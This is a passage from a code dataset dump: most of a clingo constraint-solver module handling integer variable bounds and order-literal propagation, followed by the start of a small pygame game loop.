constraint is removable if it has been marked inactive on a lower\n level.\n \"\"\"\n return self.marked_inactive and self.inactive_level <= level\n\n\nclass VarState(object):\n \"\"\"\n Class to facilitate handling order literals associated with an integer\n variable.\n\n The class maintains a stack of lower and upper bounds, which initially\n contain the smallest and largest allowed integer. These stacks must always\n contain at least one value.\n\n Members\n =======\n var -- The name of the integer variable.\n \"\"\"\n def __init__(self, var, min_int, max_int):\n \"\"\"\n Create an initial state for the given variable.\n\n Initially, the state has a lower bound of `config.min_int` and an upper bound\n of `config.max_int` and is associated with no variables.\n \"\"\"\n self.var = var\n self._upper_bound = [max_int]\n self._lower_bound = [min_int]\n self._literals = SortedDict()\n\n def push_lower(self):\n \"\"\"\n Grows the stack of lower bounds by one copying the top value.\n \"\"\"\n self._lower_bound.append(self.lower_bound)\n\n def push_upper(self):\n \"\"\"\n Grows the stack of upper bounds by one copying the top value.\n \"\"\"\n self._upper_bound.append(self.upper_bound)\n\n def pop_lower(self):\n \"\"\"\n Remove one item from the stack of lower bounds.\n\n Must be called on a stack of size greater than one.\n \"\"\"\n assert len(self._lower_bound) > 1\n self._lower_bound.pop()\n\n def pop_upper(self):\n \"\"\"\n Remove one item from the stack of upper bounds.\n\n Must be called on a stack of size greater than one.\n \"\"\"\n assert len(self._upper_bound) > 1\n self._upper_bound.pop()\n\n @property\n def lower_bound(self):\n \"\"\"\n Get the current lower bound on top of the stack.\n \"\"\"\n assert self._lower_bound\n return self._lower_bound[-1]\n\n @lower_bound.setter\n def lower_bound(self, value):\n \"\"\"\n Set the current lower bound on top of the stack.\n\n Must not be called on an empty stack.\n \"\"\"\n assert self._lower_bound\n self._lower_bound[-1] = value\n\n @property\n def min_bound(self):\n \"\"\"\n Get the smallest lower bound of the state.\n \"\"\"\n assert self._lower_bound\n return self._lower_bound[0]\n\n @property\n def upper_bound(self):\n \"\"\"\n Get the current upper bound on top of the stack.\n\n Must not be called on an empty stack.\n \"\"\"\n assert self._upper_bound\n return self._upper_bound[-1]\n\n @upper_bound.setter\n def upper_bound(self, value):\n \"\"\"\n Set the current upper bound on top of the stack.\n\n Must not be called on an empty stack.\n \"\"\"\n assert self._upper_bound\n self._upper_bound[-1] = value\n\n @property\n def max_bound(self):\n \"\"\"\n Get the largest upper bound of the state.\n \"\"\"\n assert self._upper_bound\n return self._upper_bound[0]\n\n @property\n def is_assigned(self):\n \"\"\"\n Determine if the variable is assigned, i.e., the current lower bound\n equals the current upper bound.\n \"\"\"\n return self.upper_bound == self.lower_bound\n\n def has_literal(self, value):\n \"\"\"\n Determine if the given `value` is associated with an order literal.\n \"\"\"\n return value in self._literals\n\n def get_literal(self, value):\n \"\"\"\n Get the literal associated with the given `value`.\n\n The value must be associated with a literal.\n \"\"\"\n return self._literals[value]\n\n def prev_values(self, value):\n \"\"\"\n Get the the preceeding value/literal pairs of the given value in\n descending order.\n\n The value must be associated with a literal.\n \"\"\"\n assert self.has_literal(value)\n i = self._literals.bisect_left(value)\n while i > 0:\n yield self._literals.peekitem(i-1)\n i -= 1\n\n def succ_values(self, value):\n \"\"\"\n Get the the succeeding value/literal pairs of the given value in\n ascending order.\n\n The value must be associated with a literal.\n \"\"\"\n assert self.has_literal(value)\n i = self._literals.bisect_right(value)\n while i < len(self._literals):\n yield self._literals.peekitem(i)\n i += 1\n\n def value_le(self, value):\n \"\"\"\n Find a value less than or equal to value.\n \"\"\"\n i = self._literals.bisect_right(value)\n return self._literals.peekitem(i-1) if i > 0 else None\n\n def value_ge(self, value):\n \"\"\"\n Find a value greater than or equal to value.\n \"\"\"\n i = self._literals.bisect_left(value)\n return self._literals.peekitem(i) if i < len(self._literals) else None\n\n def set_literal(self, value, lit):\n \"\"\"\n Set the literal of the given `value`.\n \"\"\"\n self._literals[value] = lit\n\n def unset_literal(self, value):\n \"\"\"\n Unset the literal of the given `value`.\n \"\"\"\n del self._literals[value]\n\n def reset(self, min_int, max_int):\n \"\"\"\n Remove all literals associated with this state.\n \"\"\"\n self._upper_bound = [max_int]\n self._lower_bound = [min_int]\n self._literals.clear()\n\n def __repr__(self):\n return \"{}=[{},{}]\".format(self.var, self.lower_bound, self.upper_bound)\n\n\nclass Level(object):\n \"\"\"\n Simple class that captures state local to a decision level.\n\n Members\n =======\n level -- The decision level.\n undo_upper -- Set of `VarState` objects that have been assigned an upper\n bound.\n undo_lower -- Set of `VarState` objects that have been assigned a lower\n bound.\n inactive -- List of constraints that are inactive on the next level.\n removed_v2cs -- List of variable/coefficient/constraint triples that have\n been removed from the State._v2cs map.\n \"\"\"\n def __init__(self, level):\n \"\"\"\n Construct an empty state for the given decision `level`.\n \"\"\"\n self.level = level\n self.inactive = []\n self.removed_v2cs = []\n # Note: A trail-like data structure would also be possible but then\n # assignments would have to be undone.\n self.undo_upper = TodoList()\n self.undo_lower = TodoList()\n\n def copy_state(self, state, lvl):\n \"\"\"\n Copy level from given state.\n \"\"\"\n assert self.level == lvl.level\n\n self.undo_lower.clear()\n for vs in lvl.undo_lower:\n self.undo_lower.add(state.var_state(vs.var))\n\n self.undo_upper.clear()\n for vs in lvl.undo_upper:\n self.undo_upper.add(state.var_state(vs.var))\n\n del self.inactive[:]\n for cs in lvl.inactive:\n self.inactive.append(state.constraint_state(cs.constraint))\n\n del self.removed_v2cs[:]\n for var, co, cs in lvl.removed_v2cs:\n self.removed_v2cs.append((var, co, state.constraint_state(cs.constraint)))\n\n def __repr__(self):\n return \"{}:l={}/u={}\".format(self.level, self.undo_lower, self.undo_upper)\n\n\nclass State(object):\n \"\"\"\n Class to store and propagate thread-specific state.\n\n Public Members\n ==============\n statistics -- A ThreadStatistics object holding statistics.\n config -- A StateConfig object holding thread specific configuration.\n\n Private Members\n ===============\n _var_state -- List of `VarState` objects.\n _litmap -- Map from order literals to a list of `VarState/value`\n pairs. If there is an order literal for `var<=value`,\n then the pair `(vs,value)` is contained in the map\n where `vs` is the VarState of `var`.\n _levels -- For each decision level propagated, there is a `Level`\n object in this list until `undo` is called.\n _v2cs -- Map from variable names to a list of\n integer/constraint state pairs. The meaning of the\n integer depends on the type of constraint.\n _l2c -- Map from literals to a list of constraints. The map\n contains a literal/constraint pair if the literal is\n associated with the constraint.\n _todo -- Set of constraints that have to be propagated on the\n current decision level.\n _facts_integrated -- A tuple of integers storing how many true/false facts\n have already been integrated on the top level.\n _lerp_last -- Offset to speed up `check_full`.\n _trail_offset -- Offset to speed up `simplify`.\n _minimize_bound -- Current bound of the minimize constraint (if any).\n _minimize_level -- The minimize constraint might not have been fully\n propagated below this level. See `update_minimize`.\n _cstate -- A dictionary mapping constraints to their states.\n _udiff, _ldiff -- Changes to upper and lower bounds since the last call\n to check.\n \"\"\"\n def __init__(self, l2c, config):\n \"\"\"\n A newly inititialized state is ready to propagate decision level zero\n after a call to `init_domain`.\n \"\"\"\n self._var_state = []\n self._litmap = {}\n self._levels = [Level(0)]\n self._v2cs = {}\n self._l2c = l2c\n self._todo = TodoList()\n self._facts_integrated = (0, 0)\n self._lerp_last = 0\n self._trail_offset = 0\n self._minimize_bound = None\n self._minimize_level = 0\n self.statistics = ThreadStatistics()\n self._cstate = {}\n self._udiff = OrderedDict()\n self._ldiff = OrderedDict()\n self.config = config\n\n def copy_state(self, master):\n \"\"\"\n Copy order literals and propagation state from the given `master` state\n to the current state.\n \"\"\"\n # pylint: disable=protected-access\n\n # adjust integrated facts\n self._facts_integrated = master._facts_integrated\n\n # make sure we have an empty var state for each variable\n for vs in master._var_state[len(self._var_state):]:\n self.add_variable(vs.min_bound, vs.max_bound)\n for vs, vs_master in zip(self._var_state, master._var_state):\n assert vs.var == vs_master.var\n vs.reset(vs_master.min_bound, vs_master.max_bound)\n\n # copy the map from literals to var states\n self._litmap.clear()\n for lit, vss in master._litmap.items():\n for vs_master, value in vss:\n vs = self.var_state(vs_master.var)\n vs.set_literal(value, lit)\n self._litmap.setdefault(lit, []).append((vs, value))\n\n # copy constraint state\n for c, cs in master._cstate.items():\n self._cstate[c] = cs.copy()\n\n # copy lookup maps\n self._v2cs.clear()\n for var, css in master._v2cs.items():\n self._v2cs[var] = [(co, self.constraint_state(cs.constraint)) for co, cs in css]\n\n # adjust levels\n self._level.copy_state(self, master._level)\n self._ldiff = master._ldiff.copy()\n self._udiff = master._udiff.copy()\n\n # copy todo queues\n for cs in master._todo:\n self._todo.add(self.constraint_state(cs.constraint))\n\n @property\n def minimize_bound(self):\n \"\"\"\n Get the current bound of the minimize constraint.\n \"\"\"\n return self._minimize_bound\n\n def update_minimize(self, constraint, dl, bound):\n \"\"\"\n Updates the bound of the minimize constraint in this state.\n \"\"\"\n if self._minimize_bound is None or bound < self._minimize_bound:\n self._minimize_bound = bound\n self._minimize_level = dl\n self._todo.add(self.constraint_state(constraint))\n elif dl < self._minimize_level:\n self._minimize_level = dl\n self._todo.add(self.constraint_state(constraint))\n\n def get_assignment(self, var_map):\n \"\"\"\n Get the current assignment to all variables.\n\n This function should be called on the state corresponding to the thread\n where a model has been found.\n \"\"\"\n return [(var, self._var_state[idx].lower_bound) for var, idx in var_map]\n\n def get_value(self, var):\n \"\"\"\n Get the current value of a variable.\n\n This function should be called on the state corresponding to the thread\n where a model has been found.\n \"\"\"\n assert isinstance(var, int)\n return self._var_state[var].lower_bound\n\n def _push_level(self, level):\n \"\"\"\n Add a new decision level specific state if necessary.\n\n Has to be called in `propagate`.\n \"\"\"\n assert self._levels\n if self._levels[-1].level < level:\n self._levels.append(Level(level))\n\n def _pop_level(self):\n \"\"\"\n Remove the decision level specific states added last.\n\n Has to be called in `undo`.\n \"\"\"\n assert len(self._levels) > 1\n self._levels.pop()\n\n def var_state(self, var):\n \"\"\"\n Get the state associated with variable `var`.\n \"\"\"\n return self._var_state[var]\n\n def constraint_state(self, constraint):\n \"\"\"\n Get the state associated with a constraint.\n \"\"\"\n return self._cstate[constraint]\n\n @property\n def _level(self):\n \"\"\"\n Get the state associated with the current decision level.\n\n Should only be used in `propagate`, `undo`, and `check`. When `check`\n is called, the current decision level can be higher than that of the\n `Level` object returned. Hence, the decision level specific state can\n only be modified for facts because only then changes also apply for\n smaller decision levels.\n \"\"\"\n return self._levels[-1]\n\n def get_literal(self, vs, value, cc):\n \"\"\"\n Returns the literal associated with the `vs.var/value` pair.\n\n Values smaller below the smallest lower bound are associated with the\n false literal and values greater or equal to the largest upper bound\n with the true literal.\n\n This function creates a new literal using `cc` if there is no literal\n for the given value.\n \"\"\"\n if value < vs.min_bound:\n return -TRUE_LIT\n if value >= vs.max_bound:\n return TRUE_LIT\n if not vs.has_literal(value):\n lit = cc.add_literal()\n # Note: By default clasp's heuristic makes literals false. By\n # flipping the literal for non-negative values, assignments close\n # to zero are preferred. This way, we might get solutions with\n # small numbers first.\n if value >= 0:\n lit = -lit\n vs.set_literal(value, lit)\n self._litmap.setdefault(lit, []).append((vs, value))\n cc.add_watch(lit)\n cc.add_watch(-lit)\n return vs.get_literal(value)\n\n def _remove_literal(self, vs, lit, value):\n \"\"\"\n Removes order literal `lit` for `vs.var<=value` from `_litmap`.\n \"\"\"\n assert lit not in (TRUE_LIT, -TRUE_LIT)\n vec = self._litmap[lit]\n assert (vs, value) in vec\n vec.remove((vs, value))\n if not vec:\n assert -lit not in self._litmap\n del self._litmap[lit]\n\n def update_literal(self, vs, value, cc, truth):\n \"\"\"\n This function is an extended version of `get_literal` that can update\n an existing order literal for `vs.var/value` if truth is either true or\n false.\n\n The return value is best explained with pseudo code:\n ```\n # literal is not updated\n if truth is None:\n return True, get_literal(vs, value, control)\n lit = TRUE_LIT if truth else -TRUE_LIT\n if value < vs.min_bound:\n old = -TRUE_LIT\n elif value >= vs.max_bound:\n old = TRUE_LIT\n elif vs.has_literal(value):\n old = vs.get_literal(value)\n else:\n old = None\n # literal has not been updated\n if old == lit:\n return True, lit\n # set the new literal\n vs.set_literal(value, lit)\n # fix the old literal and return new literal\n return cc.add_literal([old if truth else -old]), lit\n ```\n\n Additionally, if the the order literal is updated (`old` is not\n `None`), then the replaced value is also removed from `_litmap`.\n \"\"\"\n if truth is None or cc.assignment.decision_level > 0:\n return True, self.get_literal(vs, value, cc)\n lit = TRUE_LIT if truth else -TRUE_LIT\n if value < vs.min_bound or value >= vs.max_bound:\n old = self.get_literal(vs, value, cc)\n if old == lit:\n return True, lit\n return cc.add_clause([old if truth else -old]), lit\n if not vs.has_literal(value):\n vs.set_literal(value, lit)\n self._litmap.setdefault(lit, []).append((vs, value))\n return True, lit\n old = vs.get_literal(value)\n if old == lit:\n return True, lit\n # Note: If a literal is associated with both true and false, then we\n # get a top level conflict making further data structure updates\n # unnecessary.\n if old != -lit:\n vs.set_literal(value, lit)\n self._remove_literal(vs, old, value)\n self._litmap.setdefault(lit, []).append((vs, value))\n return cc.add_clause([old if truth else -old]), lit\n\n # initialization\n def add_variable(self, min_int, max_int):\n \"\"\"\n Adds `VarState` objects for each variable in `variables`.\n \"\"\"\n idx = len(self._var_state)\n self._var_state.append(VarState(idx, min_int, max_int))\n return idx\n\n def add_var_watch(self, var, co, cs):\n \"\"\"\n Watch the given variable `var` notifying the given constraint state\n `cs` on changes.\n\n The integer `co` is additional information passed to the constraint\n state upon notification.\n \"\"\"\n self._v2cs.setdefault(var, []).append((co, cs))\n\n def remove_var_watch(self, var, co, cs):\n \"\"\"\n Removes a previously added variable watch (see `add_var_watch`).\n \"\"\"\n self._v2cs[var].remove((co, cs))\n\n def add_constraint(self, constraint):\n \"\"\"\n Add the given constraint to the propagation queue and initialize its\n state.\n \"\"\"\n if constraint in self._cstate:\n return self._cstate[constraint]\n\n cs = constraint.create_state()\n\n self._cstate[constraint] = cs\n cs.attach(self)\n self._todo.add(cs)\n\n return cs\n\n def remove_constraint(self, constraint):\n \"\"\"\n Remove a constraint from the lookup lists.\n \"\"\"\n cs = self._cstate[constraint]\n cs.detach(self)\n if cs in self._level.inactive:\n self._level.inactive.remove(cs)\n if constraint in self._todo:\n self._todo.remove(constraint)\n del self._cstate[constraint]\n\n def translate(self, cc, l2c, stats, config):\n \"\"\"\n Translate constraints in the map l2c and return a list of constraint\n added during translation.\n\n This functions removes translated constraints from the map and the\n state. Constraints added during the translation have to be added to the\n propagator as well.\n \"\"\"\n remove_cs = set()\n added = []\n\n def _translate(constraints, count):\n i = j = 0\n while i < len(constraints):\n i, cs = i+1, self.add_constraint(constraints[i])\n if count:\n stats.num_constraints += 1\n stats.translate_added += 1\n ret, rem = cs.translate(cc, self, config, added)\n if not ret:\n return False\n if rem:\n stats.num_constraints -= 1\n stats.translate_removed += 1\n remove_cs.add(cs)\n continue\n if i-1 != j:\n constraints[i-1], constraints[j] = constraints[j], constraints[i-1]\n j += 1\n del constraints[j:]\n\n for lit in sorted(l2c):\n _translate(l2c[lit], False)\n _translate(added, True)\n\n # Note: Constraints are removed by traversing the whole lookup table to\n # avoid potentially quadratic overhead if a large number of constraints\n # has to be removed.\n if remove_cs:\n remove_vars = []\n for var, css in self._v2cs.items():\n i = remove_if(css, lambda cs: cs[1] in remove_cs)\n del css[i:]\n if not css:\n remove_vars.append(var)\n for var in remove_vars:\n del self._v2cs[var]\n\n # Note: In theory all inactive constraints should be remove on level 0.\n i = remove_if(self._level.inactive, lambda cs: cs in remove_cs)\n del self._level.inactive[i:]\n\n for cs in remove_cs:\n del self._cstate[cs.constraint]\n\n self._todo = TodoList(cs for cs in self._todo if cs not in remove_cs)\n\n return cc.commit(), added\n\n def simplify(self, cc, check_state):\n \"\"\"\n Simplify the state using fixed literals in the trail up to the given\n offset and the enqued constraints in the todo list.\n\n Note that this functions assumes that newly added constraints have been\n enqueued before.\n \"\"\"\n # Note: Propagation won't add anything to the trail because atm\n # there are no order literals which could be propagated. This\n # might change in the multi-shot case when order literals have\n # been added in a previous step which are then implied by the\n # newly added constraints.\n ass = cc.assignment\n trail = ass.trail\n\n # Note: The initial propagation below, will not introduce any order\n # literals other than true or false.\n while True:\n if not cc.propagate():\n return False\n\n trail_offset = len(trail)\n if self._trail_offset == trail_offset and not self._todo:\n return True\n\n if not self.propagate(cc, trail[self._trail_offset:trail_offset]):\n return False\n self._trail_offset = trail_offset\n\n if not self.check(cc, check_state):\n return False\n\n # propagation\n @measure_time_decorator(\"statistics.time_propagate\")\n def propagate(self, cc, changes):\n \"\"\"\n Propagates constraints and order literals.\n\n Constraints that became true are added to the todo list and bounds of\n variables are adjusted according to the truth of order literals.\n \"\"\"\n # Note: This function has to be as fast as possible. In C++ we can try\n # to put all relevant data into the litmap to make the function as\n # cache-friendly as possible. Max also noted that it might help to\n # propagate all order literals affected by an assignment and not just\n # the neighboring one to avoid \"rippling\" propagate calls.\n ass = cc.assignment\n\n # open a new decision level if necessary\n self._push_level(ass.decision_level)\n\n # propagate order literals that became true/false\n for lit in changes:\n self._todo.extend(map(self.constraint_state, self._l2c.get(lit, [])))\n if not self._update_domain(cc, lit):\n return False\n\n return True\n\n def _propagate_variable(self, cc, vs, value, lit, sign):\n \"\"\"\n Propagates the preceeding or succeeding order literal of lit.\n\n Whether the target literal is a preceeding or succeeding literal is\n determined by `sign`. The target order literal is given by\n `(vs.var,value)` and must exist.\n\n For example, if `sign==1`, then lit is an order literal for some\n integer value smaller than `value`. The function propagates the clause\n `lit` implies `vs.get_literal(value)`.\n\n Furthermore, if `lit` is a fact, the target literal is simplified to a\n fact, too.\n \"\"\"\n\n ass = cc.assignment\n assert ass.is_true(lit)\n assert vs.has_literal(value)\n\n # get the literal to propagate\n # Note: this explicetly does not use get_literal\n con = sign*vs.get_literal(value)\n\n # on-the-fly simplify\n if ass.is_fixed(lit) and not ass.is_fixed(con):\n ret, con = self.update_literal(vs, value, cc, sign > 0)\n if not ret:\n return False\n con = sign*con\n\n # propagate the literal\n if not ass.is_true(con):\n if not cc.add_clause([-lit, con]):\n return False\n\n return True\n\n def _propagate_variables(self, cc, vs, reason_lit, consequences, sign):\n for value, lit in consequences:\n if cc.assignment.is_true(sign*lit):\n break\n if not self._propagate_variable(cc, vs, value, reason_lit, sign):\n return False\n # Note: Literals might be uppdated on level 0 and the reason_lit is\n # already guaranteed to be a fact on level 0.\n if self.config.propagate_chain and cc.assignment.decision_level > 0:\n reason_lit = sign*lit\n\n return True\n\n def _update_constraints(self, var, diff):\n \"\"\"\n Traverses the lookup tables for constraints removing inactive\n constraints.\n\n The parameters determine whether the lookup tables for lower or upper\n bounds are used.\n \"\"\"\n lvl = self._level\n\n l = self._v2cs.get(var, [])\n i = 0\n for j, (co, cs) in enumerate(l):\n if not cs.removable(lvl.level):\n if cs.update(co, diff):\n self._todo.add(cs)\n if i < j:\n l[i], l[j] = l[j], l[i]\n i += 1\n else:\n lvl.removed_v2cs.append((var, co, cs))\n del l[i:]\n\n def _update_domain(self, cc, lit):\n \"\"\"\n If `lit` is an order literal, this function updates the lower or upper\n bound associated to the variable of the literal (if necessary).\n Furthermore, the preceeding or succeeding order literal is propagated\n if it exists.\n \"\"\"\n ass = cc.assignment\n assert ass.is_true(lit)\n\n lvl = self._level\n\n # update and propagate upper bound\n if lit in self._litmap:\n start = self._facts_integrated[0] if lit == TRUE_LIT else None\n for vs, value in self._litmap[lit][start:]:\n # update upper bound\n if vs.upper_bound > value:\n diff = value - vs.upper_bound\n if ass.decision_level > 0 and lvl.undo_upper.add(vs):\n vs.push_upper()\n vs.upper_bound = value\n self._udiff.setdefault(vs.var, 0)\n self._udiff[vs.var] += diff\n\n # make succeeding literals true\n if not self._propagate_variables(cc, vs, lit, vs.succ_values(value), 1):\n return False\n\n # update and propagate lower bound\n if -lit in self._litmap:\n start = self._facts_integrated[1] if lit == TRUE_LIT else None\n for vs, value in self._litmap[-lit][start:]:\n # update lower bound\n if vs.lower_bound < value+1:\n diff = value+1-vs.lower_bound\n if ass.decision_level > 0 and lvl.undo_lower.add(vs):\n vs.push_lower()\n vs.lower_bound = value+1\n self._ldiff.setdefault(vs.var, 0)\n self._ldiff[vs.var] += diff\n\n # make preceeding literals false\n if not self._propagate_variables(cc, vs, lit, vs.prev_values(value), -1):\n return False\n\n return True\n\n def mark_inactive(self, cs):\n \"\"\"\n Mark the given constraint inactive on the current level.\n \"\"\"\n lvl = self._level\n if cs.tagged_removable and not cs.marked_inactive:\n cs.marked_inactive = lvl.level\n lvl.inactive.append(cs)\n\n def add_dom(self, cc, literal, var, domain):\n \"\"\"\n Integrates the given domain for varibale var.\n\n Consider x in {[1,3), [4,6), [7,9)}. We can simply add the binary\n constraints:\n - right to left\n - true => x < 9\n - x < 7 => x < 6\n - x < 4 => x < 3\n - left to right\n - true => x >= 1\n - x >= 3 => x >= 4\n - x >= 6 => x >= 7\n \"\"\"\n ass = cc.assignment\n if ass.is_false(literal):\n return True\n if ass.is_true(literal):\n literal = TRUE_LIT\n vs = self.var_state(var)\n\n py = None\n for x, y in domain:\n ly = TRUE_LIT if py is None else -self.get_literal(vs, py-1, cc)\n true = literal == TRUE_LIT and ass.is_true(ly)\n ret, lx = self.update_literal(vs, x-1, cc, not true and None)\n if not ret or not cc.add_clause([-literal, -ly, -lx]):\n return False\n py = y\n\n px = None\n for x, y in reversed(domain):\n ly = TRUE_LIT if px is None else self.get_literal(vs, px-1, cc)\n true = literal == TRUE_LIT and ass.is_true(ly)\n ret, lx = self.update_literal(vs, y-1, cc, true or None)\n if not ret or not cc.add_clause([-literal, -ly, lx]):\n return False\n px = x\n\n return True\n\n def add_simple(self, cc, clit, co, var, rhs, strict):\n \"\"\"\n This function integrates singleton constraints into the state.\n\n We explicitely handle the strict case here to avoid introducing\n unnecessary literals.\n \"\"\"\n # pylint: disable=protected-access\n\n ass = cc.assignment\n\n # the constraint is never propagated\n if not strict and ass.is_false(clit):\n return True\n\n vs = self.var_state(var)\n\n if co > 0:\n truth = ass.value(clit)\n value = rhs//co\n else:\n truth = ass.value(-clit)\n value = -(rhs//-co)-1\n\n # in this case we can use the literal of the constraint as order variable\n if strict and vs.min_bound <= value < vs.max_bound and not vs.has_literal(value):\n lit = clit\n if co < 0:\n lit = -lit\n if truth is None:\n cc.add_watch(lit)\n cc.add_watch(-lit)\n elif truth:\n lit = TRUE_LIT\n else:\n lit = -TRUE_LIT\n vs.set_literal(value, lit)\n self._litmap.setdefault(lit, []).append((vs, value))\n\n # otherwise we just update the existing order literal\n else:\n ret, lit = self.update_literal(vs, value, cc, truth)\n if not ret:\n return False\n if co < 0:\n lit = -lit\n if not cc.add_clause([-clit, lit]):\n return False\n if strict and not cc.add_clause([-lit, clit]):\n return False\n\n return True\n\n @measure_time_decorator(\"statistics.time_undo\")\n def undo(self):\n \"\"\"\n This function undos decision level specific state.\n\n This includes undoing changed bounds of variables clearing constraints\n that where not propagated on the current decision level.\n \"\"\"\n lvl = self._level\n\n for vs in lvl.undo_lower:\n value = vs.lower_bound\n vs.pop_lower()\n diff = value - vs.lower_bound - self._ldiff.get(vs.var, 0)\n if diff != 0:\n for co, cs in self._v2cs.get(vs.var, []):\n cs.undo(co, diff)\n self._ldiff.clear()\n\n for vs in lvl.undo_upper:\n value = vs.upper_bound\n vs.pop_upper()\n diff = value - vs.upper_bound - self._udiff.get(vs.var, 0)\n if diff != 0:\n for co, cs in self._v2cs.get(vs.var, []):\n cs.undo(co, diff)\n self._udiff.clear()\n\n for cs in lvl.inactive:\n cs.mark_active()\n\n for var, co, cs in lvl.removed_v2cs:\n self._v2cs[var].append((co, cs))\n\n self._pop_level()\n # Note: To make sure that the todo list is cleared when there is\n # already a conflict during propagate.\n self._todo.clear()\n\n # checking\n @property\n def _num_facts(self):\n \"\"\"\n The a pair of intergers corresponding to the numbers of order literals\n associated with the true and false literal.\n \"\"\"\n t = len(self._litmap.get(TRUE_LIT, []))\n f = len(self._litmap.get(-TRUE_LIT, []))\n return t, f\n\n @measure_time_decorator(\"statistics.time_check\")\n def check(self, cc, check_state):\n \"\"\"\n This functions propagates facts that have not been integrated on the\n current level and propagates constraints gathered during `propagate`.\n \"\"\"\n ass = cc.assignment\n lvl = self._level\n # Note: Most of the time check has to be called only for levels that\n # have also been propagated. The exception is if a minimize constraint\n # has to be integrated when backtracking from a bound update.\n if ass.decision_level != lvl.level and lvl.level >= self._minimize_level:\n return True\n\n # Note: We have to loop here because watches for the true/false\n # literals do not fire again.\n while True:\n # Note: This integrates any facts that have not been integrated yet\n # on the top level.\n if self._facts_integrated != self._num_facts:\n assert ass.decision_level == 0\n if not self._update_domain(cc, 1):\n return False\n self._facts_integrated = self._num_facts\n\n # update the bounds of the constraints\n for var, diff in self._udiff.items():\n self._update_constraints(var, diff)\n self._udiff.clear()\n for var, diff in self._ldiff.items():\n self._update_constraints(var, diff)\n self._ldiff.clear()\n\n # propagate affected constraints\n todo, self._todo = self._todo, TodoList()\n for cs in todo:\n if not ass.is_false(cs.literal):\n if not cs.propagate(self, cc, self.config, check_state):\n return False\n else:\n self.mark_inactive(cs)\n\n if self._facts_integrated == self._num_facts:\n return True\n\n def check_full(self, control, check_solution):\n \"\"\"\n This function selects a variable that is not fully assigned w.r.t. the\n current assignment and introduces an additional order literal for it.\n\n This function should only be called total assignments.\n \"\"\"\n post = range(self._lerp_last, len(self._var_state))\n pre = range(0, self._lerp_last)\n for i in chain(post, pre):\n vs = self._var_state[i]\n if not vs.is_assigned:\n self._lerp_last = i\n value = lerp(vs.lower_bound, vs.upper_bound)\n self.get_literal(vs, value, control)\n return\n\n if check_solution:\n for lit, constraints in self._l2c.items():\n if control.assignment.is_true(lit):\n for c in constraints:\n assert self.constraint_state(c).check_full(self)\n\n # reinitialization\n def update(self, cc):\n \"\"\"\n This function resets a state and should be called when a new solve step\n is started.\n\n This function removes all solve step local variables from the state,\n maps fixed global literals to the true/false literal, and resets the\n minimize constraint.\n \"\"\"\n ass = cc.assignment\n\n self._minimize_bound = None\n self._minimize_level = 0\n\n remove_invalid = []\n remove_fixed = []\n for lit, vss in self._litmap.items():\n if abs(lit) == TRUE_LIT:\n continue\n\n if not ass.has_literal(lit):\n remove_invalid.append((lit, vss))\n elif ass.is_fixed(lit):\n remove_fixed.append((lit, vss))\n\n # remove solve step local variables\n # Note: Iteration order does not matter.\n for lit, vss in remove_invalid:\n for vs, value in vss:\n vs.unset_literal(value)\n del self._litmap[lit]\n\n # Note: Map bounds associated with top level facts to true/false.\n # Because we do not know if the facts have already been propagated, we\n # simply append them and do not touch the counts for integrated facts.\n for old, vss in sorted(remove_fixed):\n for vs, value in vss:\n lit = TRUE_LIT if ass.is_true(old) else -TRUE_LIT\n self._litmap.setdefault(lit, []).append((vs, value))\n vs.set_literal(value, lit)\n del self._litmap[old]\n\n def _cleanup_literals(self, cc, lit, pred):\n \"\"\"\n Remove (var,value) pairs associated with `lit` that match `pred`.\n \"\"\"\n assert lit in (TRUE_LIT, -TRUE_LIT)\n if lit in self._litmap:\n variables = self._litmap[lit]\n\n # adjust the number of facts that have been integrated\n idx = 0 if lit == TRUE_LIT else 1\n nums = list(self._facts_integrated)\n for x in variables[:nums[idx]]:\n if pred(x):\n nums[idx] -= 1\n self._facts_integrated = tuple(nums)\n\n # remove values matching pred\n i = remove_if(variables, pred)\n assert i > 0\n for vs, value in variables[i:]:\n old = vs.get_literal(value)\n if old != lit:\n # Note: This case cannot be triggered if propagation works\n # correctly because facts can only be propagated on level\n # 0. But to be on the safe side in view of theory\n # extensions, this makes the old literal equal to lit\n # before removing the old literal.\n if not cc.add_clause([-lit, old], lock=True):\n return False\n if not cc.add_clause([-old, lit], lock=True):\n return False\n self._remove_literal(vs, old, value)\n vs.unset_literal(value)\n del variables[i:]\n\n return True\n\n def cleanup_literals(self, cc):\n \"\"\"\n Remove all order literals associated with facts that are above the\n upper or below the lower bound.\n \"\"\"\n # make sure that all top level literals are assigned to the fact literal\n self.update(cc)\n\n # cleanup\n return (self._cleanup_literals(cc, TRUE_LIT, lambda x: x[1] != x[0].upper_bound) and\n self._cleanup_literals(cc, -TRUE_LIT, lambda x: x[1] != x[0].lower_bound-1))\n\n def update_bounds(self, cc, other):\n \"\"\"\n Integrate the lower and upper bounds from State `other`.\n\n The function might add clauses via `cc` to fix literals that have to be\n updated. This can lead to a conflict if states have conflicting\n lower/upper bounds.\n\n Precondition: update should be called before this function to really\n integrate all bounds.\n \"\"\"\n # pylint: disable=protected-access\n\n # update upper bounds\n for vs_b, _ in other._litmap.get(TRUE_LIT, []):\n vs_a = self._var_state[vs_b.var]\n if vs_b.upper_bound < vs_a.upper_bound:\n ret, _ = self.update_literal(vs_a, vs_b.upper_bound, cc, True)\n if not ret:\n return False\n\n # update lower bounds\n for vs_b, _ in other._litmap.get(-TRUE_LIT, []):\n vs_a = self._var_state[vs_b.var]\n if vs_a.lower_bound < vs_b.lower_bound:\n ret, _ = self.update_literal(vs_a, vs_b.lower_bound-1, cc, False)\n if not ret:\n return False\n\n return self._update_domain(cc, 1)\n","sub_path":"examples/clingo/csp/csp/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":43557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"389877342","text":"from game_test_Chelsie import Game\nimport pygame\n\nrunning = True\n\nwhile running:\n appl = Game() #instanciation d'un objet de la classe Game()\n try:\n appl.loop()\n except KeyboardInterrupt: # interruption clavier CTRL-C: appel à la méthode destroy() de appl.\n appl.destroy()\n\nwhile running:\n game = Game()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n pygame.quit()\n print(\"Fermeture du jeu\")\n elif event.type == pygame.KEYDOWN:\n game.pressed[event.key] = True\n elif event.type == pygame.KEYUP:\n game.pressed[event.key] = False\n #if event.key == pygame.K_RIGHT:\n #game.tank_tile.move_right()\n #elif event.key == pygame.K_LEFT:\n #game.tank_tile.move_left()\n\n\n# joueur 1\n#if game.pressed.get(pygame.K_q) and 